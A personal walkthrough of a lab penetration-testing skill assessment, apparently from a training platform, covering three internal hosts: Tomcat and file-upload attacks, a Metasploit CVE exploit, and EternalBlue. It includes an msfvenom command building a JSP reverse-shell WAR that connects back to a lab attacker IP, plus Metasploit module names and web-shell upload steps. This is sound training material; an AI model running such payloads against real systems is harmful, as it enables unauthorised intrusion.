Skill Assessment

TL;DR:

With this skill assessment, I had a very bad time using my own attacking machine not their pwnbox. Everything worked fine with the pwnbox but the latency...

We are given a foothold already on the internal network, so it's gonna be an internal pentest on their web apps.

First windows host has 2 file upload vulnerabilities, one with a war file that we must create our own payload with msfvenom and the other was a simple web shell injection.

Second one was running Linux and had a CVE which we exploited with metasploit.

Third one was a low hanging fruit: EternalBlue.

HOST 1

Internal network

Checking the status.inalenfreight.local on port 80 we find this website :

Obviously, we have a file upload field in there. But before checking this website I also checked status.inlanefreight.local on port 8080 and found another web portal for configuring apps on an Apache server.

Apache Tomcat config portal

Okay now we'll stick with the first one and just go with the Antak web shell since it's a windows target, so we make a copy of it on a directory of our choice and then modify the username and passsword.

Upon successful upload here are some ways of getting the hostname and share name:

PS> hostname
PS> [System.Net.Dns]::GetHostName()
PS> (Get-WmiObject -Class Win32_ComputerSystem).Name

Now lets try to find another way to access the target machine since we have the tomcat portal and tomcat access creds on our desktop:

At this point I tested metasploit with the following commands : 

msfconsole> search exploit tomcat -os:windows
msfconsole> use multi/http/tomcat_mgr_upload # Didn't work
msfconsole> use multi/http/tomcat_mgr_deploy # Didn't work

With both failed and looking a bit on google, i found out that this can't get us a webshell but a reverse shell, we need a war file specific for a windows target hosting the tomcat version, so we gotta craft our own payload using msfvenom.

$msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.5 LPORT=9443 -f war > shell.war

After setting up a listener and uploading, deploying the war file, we got a succesful hit back:

HOST 2

The second host which hosts a blog is self explanatory already giving us intel about a CVE and even an exploit ready for use on the foothold machine even login creds as an admin: Free Win

So after a bit of research i found out that the goal behind this thing is importing exploitdb exploits into metasploit because this exploit isn't loaded yet.

I run into this blog which explained it well:

LogoImport Exploit-DB Exploits into Metasploit

After poking around a little bit i found out that the module is already loaded in metasploit lol so no need to load it again, but you know that was a good practice either ways.

So, after configuring the VHOST, RHOST, RPORT, USERNAME and USERPASSWORD fields on metasploit exploit options we get our beloved shell on the target host:

HOST 3

For this host i made a huge mistake of not sticking with the subnet they provided before the questions, instead of scanning 172.16.1.13 i went for lab.inlanefreight.local which was in the /etc/hosts. Definitely a rabbit hole.

Here are the nmap results:

As mentioned in here, when we see Windows Server 2016, 2008..etc we should think of the one and only EternalBlue. Which is confirmed in the nmap scan :

So not much thought in here, metasploit is the way to go, and as simple as we did on the Exploiting Windows part, we easily get a Shell on the final target host!

PreviousWeb Shells & PayloadsNextMetasploit

Last updated